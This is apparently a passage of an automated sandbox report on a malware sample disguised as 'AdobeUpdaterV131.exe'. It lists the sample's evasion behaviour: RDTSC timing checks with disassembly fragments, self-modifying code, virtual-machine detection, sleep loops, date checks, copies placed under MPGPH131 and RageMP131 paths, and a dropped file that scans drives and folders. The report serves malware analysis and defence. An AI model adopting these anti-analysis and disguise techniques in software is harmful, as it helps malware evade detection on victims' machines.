Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F104E6 second address: 4F104F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F104F6 second address: 4F104FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F104FC second address: 4F10533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F09D0731CB9h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10533 second address: 4F10537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10537 second address: 4F1053D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F1053D second address: 4F1058A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F09D0D9C3D9h 0x0000000e jmp 00007F09D0D9C3E0h 0x00000013 push eax 0x00000014 pushad 0x00000015 mov dh, 25h 0x00000017 pushad 0x00000018 mov ebx, esi 0x0000001a mov al, 50h 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F09D0D9C3DDh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10619 second address: 4F1062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F1062B second address: 4F10667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d jmp 00007F09D0D9C3DCh 0x00000012 inc edi 0x00000013 jmp 00007F09D0D9C3E0h 0x00000018 and dword ptr [ebp-04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F09D0D9C3DAh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10667 second address: 4F10676 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10676 second address: 4F1067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F1067C second address: 4F10680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10680 second address: 4F10684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10684 second address: 4F1069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0731CAAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F1069A second address: 4F10706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0A4192EDE8h 0x0000000f jmp 00007F09D0D9C3E6h 0x00000014 lea eax, dword ptr [ebp-00000110h] 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e mov dh, 04h 0x00000020 popad 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F09D0D9C3E7h 0x0000002a jmp 00007F09D0D9C3E8h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10774 second address: 4F107EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 jmp 00007F09D0731CABh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f pushad 0x00000010 mov dh, ch 0x00000012 pushfd 0x00000013 jmp 00007F09D0731CB1h 0x00000018 and eax, 6B884E16h 0x0000001e jmp 00007F09D0731CB1h 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007F0A412C45B2h 0x0000002b jmp 00007F09D0731CAEh 0x00000030 mov eax, dword ptr [ebp-00000110h] 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F09D0731CB7h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F107EA second address: 4F107F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F107F0 second address: 4F10822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebx], eax 0x0000000a jmp 00007F09D0731CB7h 0x0000000f lea ecx, dword ptr [ebp-0000010Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dx, A236h 0x0000001c movsx edi, si 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10871 second address: 4F108B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F09D0D9C3DEh 0x00000010 je 00007F0A4192EBFBh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F09D0D9C3DDh 0x0000001e movzx ecx, di 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F108B8 second address: 4F10944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F09D0731CB0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F09D0731CB1h 0x00000017 or ecx, 6C0E73C6h 0x0000001d jmp 00007F09D0731CB1h 0x00000022 popfd 0x00000023 mov eax, 71A7A877h 0x00000028 popad 0x00000029 nop 0x0000002a pushad 0x0000002b mov ah, 2Fh 0x0000002d mov ebx, 147D1C68h 0x00000032 popad 0x00000033 lea ecx, dword ptr [ebx+04h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov dx, ax 0x0000003c pushfd 0x0000003d jmp 00007F09D0731CB4h 0x00000042 or ecx, 101EEEC8h 0x00000048 jmp 00007F09D0731CABh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10944 second address: 4F1094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 4F10A6E second address: 4F10A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Special instruction interceptor: First address: 8F865B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Special instruction interceptor: First address: 921F14 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Special instruction interceptor: First address: 75F912 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Special instruction interceptor: First address: 90A742 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Special instruction interceptor: First address: 98762D instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: D8865B instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: DB1F14 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: BEF912 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: D9A742 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: E1762D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 89865B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 8C1F14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 6FF912 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 8AA742 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 92762D instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_04F1074F rdtsc 0_2_04F1074F
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window / User API: threadDelayed 1372 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window / User API: threadDelayed 430 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window / User API: threadDelayed 6206 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1565 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1121 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1114 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1574 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1116 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1138 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 462 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1071 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1233 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 1244 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 366 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 369 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 478 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 5627 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Found evaded block containing many API calls
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Evaded block: after key decision
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6472 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6472 Thread sleep time: -82041s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104 Thread sleep count: 1372 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104 Thread sleep time: -2745372s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6596 Thread sleep count: 63 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6500 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6500 Thread sleep time: -100050s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6276 Thread sleep count: 160 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6276 Thread sleep time: -320160s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6596 Thread sleep count: 430 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6596 Thread sleep time: -43000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 7288 Thread sleep count: 210 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6428 Thread sleep count: 166 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 6428 Thread sleep time: -332166s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 7288 Thread sleep count: 239 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104 Thread sleep count: 6206 > 30 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe TID: 5104 Thread sleep time: -12418206s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7480 Thread sleep count: 94 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7480 Thread sleep time: -188094s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7464 Thread sleep count: 121 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7464 Thread sleep time: -242121s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7660 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7420 Thread sleep count: 1565 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7420 Thread sleep time: -156500s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7724 Thread sleep count: 1121 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7452 Thread sleep count: 106 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7452 Thread sleep time: -212106s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7724 Thread sleep count: 1114 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7724 Thread sleep time: -111400s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7508 Thread sleep count: 113 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7508 Thread sleep time: -226113s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7516 Thread sleep count: 112 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7516 Thread sleep time: -224112s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7656 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7432 Thread sleep count: 1574 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7432 Thread sleep time: -157400s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7728 Thread sleep count: 1116 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7564 Thread sleep count: 93 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7564 Thread sleep time: -186093s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7540 Thread sleep count: 91 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7540 Thread sleep time: -182091s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7556 Thread sleep count: 118 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7556 Thread sleep time: -236118s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7896 Thread sleep time: -48024s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7868 Thread sleep count: 1138 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7868 Thread sleep time: -2277138s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7852 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7852 Thread sleep count: 462 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7852 Thread sleep time: -46200s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8072 Thread sleep count: 208 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7872 Thread sleep count: 1071 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7872 Thread sleep time: -2143071s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8072 Thread sleep count: 245 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7884 Thread sleep count: 1233 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7884 Thread sleep time: -2467233s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7892 Thread sleep count: 1244 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7892 Thread sleep time: -2489244s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6592 Thread sleep count: 366 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6592 Thread sleep time: -732366s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6564 Thread sleep count: 369 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6564 Thread sleep time: -738369s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8108 Thread sleep count: 62 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8184 Thread sleep count: 322 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8184 Thread sleep time: -644322s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8108 Thread sleep count: 478 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8108 Thread sleep time: -47800s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1196 Thread sleep count: 221 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1196 Thread sleep count: 254 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8172 Thread sleep count: 5627 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8172 Thread sleep time: -11259627s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 004E1754h 1_2_004E1718
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 15_2_00E31718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00E31754h 15_2_00E31718
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_004E29E2
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 15_2_00E329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 15_2_00E329E2
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_004E2B8C
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior
Source: Amcache.hve.1.dr Binary or memory string: VMware
Source: MPGPH131.exe, 0000000A.00000002.4130977280.000000000122A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}G
Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}%
Source: Amcache.hve.1.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: xRp.exe, 00000001.00000002.1856041634.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000003.1666399765.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ADC2C92C@
Source: xRp.exe, 00000001.00000002.1856041634.0000000000898000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: RageMP131.exe, 0000000E.00000003.1932359477.0000000001177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.1.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: AdobeUpdaterV131.exe, 00000000.00000003.1712286461.00000000011BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}0
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&[
Source: RageMP131.exe, 0000000E.00000002.4131139448.0000000001165000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: RageMP131.exe, 0000000E.00000002.4131139448.0000000001165000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 00000009.00000002.4130830762.0000000001490000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.1.dr Binary or memory string: vmci.sys
